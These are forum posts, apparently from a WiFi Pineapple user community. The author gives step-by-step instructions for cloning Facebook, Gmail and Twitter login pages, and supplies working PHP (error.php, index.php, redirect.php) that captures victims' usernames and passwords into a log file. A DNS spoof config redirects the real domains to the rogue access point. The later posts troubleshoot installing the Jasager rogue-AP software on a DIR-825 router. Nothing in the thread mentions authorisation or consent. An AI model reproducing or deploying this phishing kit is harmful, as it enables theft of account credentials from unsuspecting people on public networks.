loozr

I would recommend you to try create your own site. Me self I have NO coding experience besides a little logic thinking, and sites like facebook is rather simple to clone. I have maybe been doing this myself for a couple of days now, and feel I have learned something already. You just rightclick and choose save entire page, then you just edit the .htm(l) file in an editor(i.e. notepad++) and search for action. You will find a link right after action, replace that link with i.e. error.php(which is your php script that posts information to a log file). Then a little further down the code you will find something like this for the username/email <input type="text" class="inputtext" name="email" id="email" value="" tabindex="1" /> [/CODE] Here you replace name="email" to name="name". (at least with the error.php that I'm using.) And for the password you really don't have to change in this example, as it should be name="pass" [CODE] <input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /> [/CODE] After that you just save the htm(l) file and upload it(and the folder with the files) to your pineapple and test it out. To make it clear, this might be different with other post scripts than my error.php. But I guess you figured that out since it seems you have been coding before. As the reason why you should try doing this yourself is that you learn a lot about the webpages while screwing around in the code, and a lot of pages is quite more difficult than FB. I would recommend you to try do it manually first, and if you are unsuccessful, THEN you can use tools like SET and others. Hopefully you understand what I have written, and hopefully my directions are correct. ;)

Actually it seem I got it working when i changed the start of the index.php. as Neworld suggested in another thread. I also changed the line that require error.php, into redirect.php. Aand in my case I have all the phish files symlinked directly to /www/ so I have edited out the $phishFolder since I didn't need it. Pasting the complete working index.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $skipInclude = 0; if (strpos($ref, "facebook")) { $phishFile = "facebook.htm"; } elseif (strpos($ref, "gmail")) { $phishFile = "gmail.htm"; } elseif (strpos($ref, "twitter")) { $phishFile = "twitter.htm"; } else { require('redirect.php'); $skipInclude = 1; } if ($skipInclude == 0) { include($phishFile); } ?> [/CODE] And so far it seems to be working like a charm! :)

Thanks for you reply! And I'm sorry about the amount of data that i pasted, just wasn't sure about what you needed to know. Actually I pasted the ls of the /www folder right after my index.php in my previous post. Just to clarify my facebook files looks like this /www/facebook.htm /www/facebook_files/ The thing is, I have tried to put both "./" and nothing ie "" but in any case I'm just seeing an empty page, whith the code as mentioned in my previous post. But if i try to enter direct url i.e. 172.16.42.1/facebook.htm then the facebook page appears as it should, and phishing works as intended. I just can't seem to understand what I did wrong.

Hi there! First of all thank you so much for sharing all your work! It's much appreciated! However I seem to have some problems making this work. I'ts probably just me beeing stupid.. My phish files should be okay, at least they work nice whith "the original method". My problem is that with this method without folder names my phishfiles just won't work. All that happens when i try to open i.e. facebook is that the page either does nothing, or goes back to the previous page. The code of the page is then showing up as: <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> [/CODE] Which actually seems to be the last part of my error.php. I just don't understand why the browser would go directly to error.php, before the phishingpage.. My error.php [CODE] <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("pineapple/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> [/CODE] So my index.php looks like this. [CODE] <?php $ref = $_SERVER['HTTP_REFERER']; $phishFolder = "./"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish" $skipInclude = 0; if (strpos($ref, "facebook")){ $phishFile = "facebook.htm"; } elseif (strpos($ref, "gmail")) { $phishFile = "gmail.html"; } elseif (strpos($ref, "twitter")) { $phishFile = "twitter.htm"; } else { require('error.php'); $skipInclude = 1; } if ($skipInclude == 0) { include($phishFolder.$phishFile); } ?> [/CODE] I have symlinked /usb/phish/* to /www/ thats why I have "./" as phishfolder. And I don't yet have anything for gmail, but facebook and twitter should still work. I think like this I would not have to edit all the links for facebook_files folder, right? ls -l /www [CODE] root@Pineapple:~# ls -l /www lrwxrwxrwx 1 root root 30 Aug 9 11:32 accounts.google.htm -> /usb/phish/accounts.google.htm lrwxrwxrwx 1 root root 32 Aug 9 11:32 accounts.google_files -> /usb/phish/accounts.google_files -rw-r--r-- 1 root root 621 Aug 9 10:32 error.php lrwxrwxrwx 1 root root 23 Aug 9 11:21 facebook.htm -> /usb/phish/facebook.htm lrwxrwxrwx 1 root root 25 Aug 9 11:21 facebook_files -> /usb/phish/facebook_files -rw-r--r-- 1 root root 496 Aug 9 14:16 index.php -rw-r--r-- 1 root root 113 Jun 5 18:42 indexORG.php lrwxrwxrwx 1 root root 23 Aug 9 12:11 matchcom.htm -> /usb/phish/matchcom.htm drwxr-xr-x 1 root root 0 Jul 2 01:28 pineapple -rw-r--r-- 1 root root 490 Aug 9 12:41 redirect.php lrwxrwxrwx 1 root root 22 Aug 9 11:32 twitter.htm -> /usb/phish/twitter.htm lrwxrwxrwx 1 root root 24 Aug 9 11:32 twitter_files -> /usb/phish/twitter_files [/CODE] And my DNS spoof config states: [CODE] 172.16.42.1 facebook.com 172.16.42.1 www.facebook.com 172.16.42.1 match.com 172.16.42.1 accounts.google.com 172.16.42.1 twitter.com [/CODE] Oh, and my redirect.php [CODE] <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")){ header('Location: facebook.htm'); } if (strpos($ref, "match")){ header('Location: matchcom.htm'); } if (strpos($ref, "accounts.google")){ header('Location: accounts.google.htm'); } if (strpos($ref, "gmail")){ header('Location: accounts.google.htm'); } if (strpos($ref, "twitter")){ header('Location: twitter.htm'); } require('error.php'); ?> [/CODE] Any help will be appreciated! :)

Okey, to fix the syntax error above, i edited out all the ':' at the end of 'if' lines. Now when I run /etc/init.d/jasager start I get this: I have googled some but i can't seem to find a solution to the UTF_8 (NameError). Any help or hints will be much appreciated!

May i ask which version of Ruby you got installed? I think that the jasager scripts does not work in Ruby 1.9.2, but i may be wrong..?

After several trial and errors I flashed the device with And added support for external rootfs. Thereafter i installed the required packages for jasager. So everything is installed, or at least untared since the *.ipkg packages didn't have the correct architecture for my build. copied /karma/www* to /www/ and browsed to /index.html, where i got redirected to /cgi-bin/status.rb who is showing me a white page. /etc/init.d/jasager start gives me: /karma/bin/create_option_list.rb:13: syntax error, unexpected ':', expecting keyword_then or ';' or '\n' /karma/bin/create_option_list.rb:28: syntax error, unexpected keyword_end, expecting '}' /karma/bin/create_option_list.rb:37: syntax error, unexpected $end, expecting '}' /etc/rc.common: line 1: httpd: not found What could be wrong? Do i have to edit /karma/bin/create_option_list? Or should i add something to /etc/rc.common?

I have now installed OpenWRT to the device. I used http://downloads.openwrt.org/backfire/10.03.1-rc4/ar71xx/openwrt-ar71xx-dir-825-b1-squashfs-factory.bin. Set the passwd and changed networking settings to 192.168.10.1/255.255.255.0, and then rebooted. Then i did the following: So, what should I do when I'm already running out of space? Is there some software i dont need on the router? Like LUCI?

First of all, is it even possible to install Jasager on DIR-825? It's Atheros based, and supported by OpenWRT.. If so, what should i do to get it working? All the guides I have found are based on the firmware for the fon.. All help is much appreciated.

Hi there! This is my first post here, and my english is not too good, so please bare with me. (: OK, to the point. I recently bought a used dir-825, just because i could load OpenWRT on it. And that was just a breeze, and it works great. The problem is that I would love to be capable of using Jasager on this device. Is that at all possible? If it is, what should i do? Which openwrt version? jffs/squashfs? and do I have to use a USB device for storage to accomplish this? What i have tried so far. Various versions of OpenWRT, bleeding edge, latest stable, and both jffs and squashfs. But when i'm trying to install the pachages requiered by Jasager(ruby, ruby-core, ruby-rexml, webif, kmod-gpio) I'm only running out of space. In addition to that, if I try to run just the jasager_2.1-1_mips.ipk i just get an error stating that i got the wrong architecture. However i am able to untar the tarball, but should i untar this from / or from /root/ ? Thanx in advance for all help regarding my problem! :)